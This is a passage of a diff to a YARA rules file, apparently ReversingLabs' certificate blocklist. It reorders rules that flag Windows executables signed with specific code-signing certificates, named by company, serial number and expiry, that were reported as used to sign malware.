+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Datamingo Limited" and ( pe.signatures [ i ] . serial == "00:9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" or pe.signatures [ i ] . serial == "9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" ) and 1557187200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_269174F9Fe7C6Ed4E1D19B26C3F5B35F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63938a97-2cb3-52b0-9717-c8949e3fae46"
+		id = "fbcf1f18-f612-5516-9a67-2564de76c456"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9880-L9898"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3866-L3882"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "69b9012fc4ab9636d159de49ff452f054030c1157cf70a95512b2a0748dad7c0"
+		logic_hash = "95c9720d6311c2fe7026b6cac092d59967479e6c9382eac1d26f7745efa92860"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20405,21 +42799,21 @@ rule REVERSINGLABS_Cert_Blocklist_Ba67B0De51Ebb9B1179804E75357Ab26 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fjordland Bike Wear ApS" and ( pe.signatures [ i ] . serial == "00:ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" or pe.signatures [ i ] . serial == "ba:67:b0:de:51:eb:b9:b1:17:98:04:e7:53:57:ab:26" ) and 1636145940 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GO ONLINE d.o.o." and pe.signatures [ i ] . serial == "26:91:74:f9:fe:7c:6e:d4:e1:d1:9b:26:c3:f5:b3:5f" and 1586386919 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_523Fb4036368Dc26192D68827F2D889B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "50cc539a-1f00-566d-a83f-b4d8459506d8"
+		id = "bfce2ea9-cbe0-5b58-b7f8-39d2dad28db6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9900-L9918"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3884-L3900"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d37e1d94048339a86b8fa173d3ab753fc5e79329b73df9fda5815cd622c57745"
+		logic_hash = "f1886a046305637d335c493972560de56d8186bf99183aed5e2040b2e530fc22"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20429,21 +42823,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cff2B275Ba8A1Dde83Ac7Ff858399A62 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XL-FORCE ApS" and ( pe.signatures [ i ] . serial == "00:cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" or pe.signatures [ i ] . serial == "cf:f2:b2:75:ba:8a:1d:de:83:ac:7f:f8:58:39:9a:62" ) and 1636111842 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEDUZA SERVICE GROUP" and pe.signatures [ i ] . serial == "52:3f:b4:03:63:68:dc:26:19:2d:68:82:7f:2d:88:9b" and 1586847880 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_84F842F6D33Cd2F25B88Dd1710E21137 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a72a0001-a272-506d-b610-c028ed8ac6da"
+		id = "202593d3-d63a-5852-b680-516504d92031"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9920-L9938"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3902-L3920"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "33a05d46b40ffdf49bfa5facca41ebdf6bedcabc1cb1f5b9bf2d043ad1c869b0"
+		logic_hash = "5aad8e95d1306626b63d767fce4706104330dd776b75c09cc404227863564307"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20453,21 +42847,21 @@ rule REVERSINGLABS_Cert_Blocklist_D22E026C5B5966F1Cf6Ef00A7C06682E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT, LLC" and ( pe.signatures [ i ] . serial == "00:d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" or pe.signatures [ i ] . serial == "d2:2e:02:6c:5b:59:66:f1:cf:6e:f0:0a:7c:06:68:2e" ) and 1636456620 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DataNext s.r.o." and ( pe.signatures [ i ] . serial == "00:84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" or pe.signatures [ i ] . serial == "84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" ) and 1586775720 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fbcaa289Ba925B4E247809B6B028202 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e5643d08-5957-58b0-8b46-d5e339dfba9c"
+		id = "d0c4c6c0-d8e3-5efc-a87b-01d1f98a2c18"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9940-L9956"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3922-L3938"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "21c8e8f10d1e4b9eb917c86ac868de2afcd5776a9c1d59149df1d07d8c3e14b9"
+		logic_hash = "c41a4f9ccda54b9735313edf9042b831e6eaca149c089f74a823cee6719e1064"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20477,21 +42871,21 @@ rule REVERSINGLABS_Cert_Blocklist_3054F940C931Bad7B238A24376C6A5Cc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE CLEAN LTD" and pe.signatures [ i ] . serial == "30:54:f9:40:c9:31:ba:d7:b2:38:a2:43:76:c6:a5:cc" and 1637030220 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kimjac ApS" and pe.signatures [ i ] . serial == "4f:bc:aa:28:9b:a9:25:b4:e2:47:80:9b:6b:02:82:02" and 1588227220 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1F2E8Effbb08C7Dbcc7A7F2D835457B5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ffb592c-eec5-51b1-9840-b6b72269fc31"
+		id = "cf032593-e742-56d5-a579-3f38a31e2c0c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9958-L9976"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3940-L3956"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f307a0b598f0876c003aa43db50e024698b6f93931e626c085f98553c14ec2ae"
+		logic_hash = "0b446641617d435c3d312592957e19c3d391b0149eafcf9ac2da51e8d9080eb4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20501,21 +42895,21 @@ rule REVERSINGLABS_Cert_Blocklist_A617E23D6Ca8F34E2F7413Cd299Fc72B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXPRESS BOOKS LTD" and ( pe.signatures [ i ] . serial == "00:a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" or pe.signatures [ i ] . serial == "a6:17:e2:3d:6c:a8:f3:4e:2f:74:13:cd:29:9f:c7:2b" ) and 1636971821 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RTI, OOO" and pe.signatures [ i ] . serial == "1f:2e:8e:ff:bb:08:c7:db:cc:7a:7f:2d:83:54:57:b5" and 1581382360 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aeba4C39306Fdd022849867801645814 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f4a26f2-689a-57bd-8028-d3554e339e60"
+		id = "f8cb78cf-541c-5038-b7af-83679c978ec8"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9978-L9994"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3958-L3976"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2377eeb5316d25752443735e78d0ad7de398a2677f5a0fd45fd6e6c87720d49b"
+		logic_hash = "82c149f1d8ef93a0df2035690c5cdca935236687bc36a35a84c3d6610eb6902c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20525,21 +42919,21 @@ rule REVERSINGLABS_Cert_Blocklist_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" and 1637141034 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SK AI MAS GmbH" and ( pe.signatures [ i ] . serial == "00:ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" or pe.signatures [ i ] . serial == "ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" ) and 1579478400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_028D50Ae0C554B49148E82Db5B1C2699 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b557864d-c573-5789-9959-8df3036d5ac5"
+		id = "76ccda8a-bdea-5db2-a3a4-11292bfb3c95"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L9996-L10012"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3978-L3994"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bc3ef217455b74900cae114d25b02325d2bef25c11873342df1dd2369cbce76a"
+		logic_hash = "e3cc0066cad56d78a3f42e092befa3b0855b2ed33c8465c5ecbb19fec082d35e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20549,21 +42943,21 @@ rule REVERSINGLABS_Cert_Blocklist_292Eb1133507F42E6F36C5549C189D5E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" and 1638832273 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" and 1579478400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_684F478C7259Dde0Cfe2260112Ca9846 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "620c04df-e613-5319-aa00-646c7e0c8031"
+		id = "840af428-47e0-529e-9db9-8ab9c968f2e3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10014-L10030"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3996-L4012"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24bee3563e0867ef6702e7f57bbce7075f766410650ae5ce1e2e8c7b14a3eaca"
+		logic_hash = "59654ba1df27029a04ef3b1a1bb54f6c15b727f2013923a11a729752b8829743"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20573,21 +42967,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Fbf16A33D26390A15F046C310030Cf0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MACHINES SATU MARE SRL" and pe.signatures [ i ] . serial == "5f:bf:16:a3:3d:26:39:0a:15:f0:46:c3:10:03:0c:f0" and 1638390070 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"IP EM\"" and pe.signatures [ i ] . serial == "68:4f:47:8c:72:59:dd:e0:cf:e2:26:01:12:ca:98:46" and 1584981648 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B7C32208A954A483Dd102E1Be094867 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6678bd73-bf4d-5576-8bf2-b721ee288da7"
+		id = "d16e74d8-2c46-508b-b518-a542603ca726"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10032-L10048"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4014-L4030"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "27610bb3bf069991803611474abf44a3bf82fc9283d0412a1c24ae46a3f5352e"
+		logic_hash = "49e2208a7d2b5684283c1dfc9856f864d16b50f951f58e0252c97419819a46ec"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20597,21 +42991,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F007898Afcba5F8Af8Ae65D01803617 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" and 1638372946 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Win Sp Z O O" and pe.signatures [ i ] . serial == "0b:7c:32:20:8a:95:4a:48:3d:d1:02:e1:be:09:48:67" and 1583884800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E72Daf2B9A4449E946009E5084A8E76 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "37e60515-0395-51a5-8bfa-35e3e336d60c"
+		id = "aa7c6cbe-0794-59e3-a675-93beeccc9784"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10050-L10068"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4032-L4048"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "05b2f297454e7080591b85991b224193eb89fc5074eb3c2e484ceadad2de4cb7"
+		logic_hash = "f1a7bf6c18e0ebf8aef53feb7d7789ce87c96e00962c64e07a37d968702d2fa5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20621,21 +43015,21 @@ rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALVE ACTUATION LTD" and ( pe.signatures [ i ] . serial == "00:e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" or pe.signatures [ i ] . serial == "e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" ) and 1637712000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Infoteh63" and pe.signatures [ i ] . serial == "3e:72:da:f2:b9:a4:44:9e:94:60:09:e5:08:4a:8e:76" and 1591787570 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_11Edd343E21C36Ac985555D85C16135F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "da483b60-d400-54ef-84e0-ea00b299b466"
+		id = "219f709f-4e05-5d0e-97a4-eca1e65153a3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10070-L10086"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4050-L4066"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "00b7ff8f3cbc04c48c71433c384d7a7884b856f261850e33ea4413a12cf5a1b5"
+		logic_hash = "17feeed4be074a30572eb12fc81dc15d1b06f2d3f7b4b4fb4443391c62ac4d9b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20645,21 +43039,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" and 1637971201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pribyl Handels GmbH" and pe.signatures [ i ] . serial == "11:ed:d3:43:e2:1c:36:ac:98:55:55:d8:5c:16:13:5f" and 1589925600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_093Fe63D1A5F68F14Ecaac871A03F7A3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2a56ff80-584b-5b8b-80ae-e763339cd17a"
+		id = "ce0b23fd-5f79-5b90-8d5c-2ff59ac39df6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10088-L10106"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4068-L4084"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "74b1b48f0179187ea7bb8ef4663bf13da47f5c6405ecc5589706184564c05727"
+		logic_hash = "333c58a9af2d94604b637ab0a7280b6688a89ff73e30a93a8daed040fab7f620"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20669,21 +43063,21 @@ rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ambidekstr LLC" and ( pe.signatures [ i ] . serial == "00:c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" or pe.signatures [ i ] . serial == "c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" ) and 1616976000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPECTACLE IMAGE LTD" and pe.signatures [ i ] . serial == "09:3f:e6:3d:1a:5f:68:f1:4e:ca:ac:87:1a:03:f7:a3" and 1562716800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bb26B7B6634D5Db548C437B5085B01C1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9019330e-5ab5-5d37-85a1-0e882dbd68ce"
+		id = "443a876a-dfd7-5a9e-bb15-a44a53363494"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10108-L10124"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4086-L4104"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f6780751ae553771eb57201a8672847a24512e6279b6a4fd843d8ee2f326860a"
+		logic_hash = "58d574b196f84416eb04000205cd8f4817618003f2948bb0eb7d951c282ef6ff"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20693,21 +43087,21 @@ rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" and 1641859201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"IT Mott\"" and ( pe.signatures [ i ] . serial == "00:bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" or pe.signatures [ i ] . serial == "bb:26:b7:b6:63:4d:5d:b5:48:c4:37:b5:08:5b:01:c1" ) and 1591919307 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_29128A56E7B3Bfb230742591Ac8B4718 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "78f9fdf0-d8c6-5316-8053-42f77adf95d1"
+		id = "b868d2f2-3852-57a3-be01-32cc16eb2ff7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10126-L10142"
